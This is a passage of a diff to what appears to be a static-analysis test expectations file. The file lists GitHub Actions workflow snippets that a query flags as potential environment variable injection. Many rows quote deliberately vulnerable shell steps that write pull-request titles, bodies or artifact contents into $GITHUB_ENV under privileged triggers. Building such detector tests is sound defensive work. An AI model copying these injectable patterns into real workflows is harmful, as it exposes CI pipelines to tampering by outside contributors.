"CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | @@ -92,40 +129,3 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths -#select -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree 